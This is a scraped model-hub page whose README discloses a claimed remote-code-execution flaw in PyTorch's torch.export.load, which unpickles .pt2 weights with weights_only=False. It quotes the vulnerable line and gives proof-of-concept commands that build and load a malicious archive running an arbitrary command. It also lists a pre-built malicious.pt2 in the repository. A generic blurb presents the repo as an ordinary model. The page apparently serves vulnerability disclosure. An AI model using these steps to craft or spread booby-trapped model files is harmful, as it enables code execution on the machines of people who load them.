Downloads · 30 days
0
yibai777/pytorch-audit2
pytorch-audit2 is a machine learning model from yibai777. Use it for the machine learning task on the model card, and read the license before you ship it in a product.
Format: Torch Export (.pt2) – PyTorch Project: PyTorch (pytorch/pytorch) Version: 2.12.0 Severity: Critical – RCE on model load
Downloads · 30 days
0
Access
Public
Updated May 15, 2026
Repo size
—
Likes
0
Public
Click a slice to open those files.
.png51.9 KB · 73%
From the Hugging Face model README
Format: Torch Export (.pt2) – PyTorch
Project: PyTorch (pytorch/pytorch)
Version: 2.12.0
Severity: Critical – RCE on model load
torch.export.load deserialization issue. The fix added a restricted pickle allowlist for the exported program metadata._package.py:878 uses torch.load(weights_only=False) directly — a separate code path not covered by the CVE-2024-31580 fix.torch.export.load() loads model weights from within a PT2 archive using torch.load() with weights_only=False:
torch/export/pt2_archive/_package.py:878:
state_dict[weight_fqn] = torch.load(
io.BytesIO(weight_bytes), weights_only=False
)
Even though torch.load() defaults to weights_only=True since PyTorch 2.6, the PT2 archive loader explicitly passes weights_only=False, allowing arbitrary code execution when loading a malicious .pt2 file.
Any user or application that calls torch.export.load() on an untrusted .pt2 file gets RCE. This includes users downloading PT2 models from Hugging Face, model zoos, or any untrusted source.
# 1. Generate malicious .pt2 (executes calc.exe by default)
python poc_pt2_rce.py --output malicious.pt2
# 2. Victim loads the file
torch.export.load("malicious.pt2")
Or test directly:
python poc_pt2_rce.py --cmd "echo PWNED" --test-load
weights_config to set use_pickle=Trueos.system)_load_state_dict calls torch.load(weights_only=False) → RCE| File | Purpose |
|---|---|
poc_pt2_rce.py | Exploit PoC – generate & test malicious .pt2 |
malicious.pt2 | Pre-built malicious archive (executes calc.exe) |
torch/export/pt2_archive/_package.py:878torch/serialization.py:1316-1637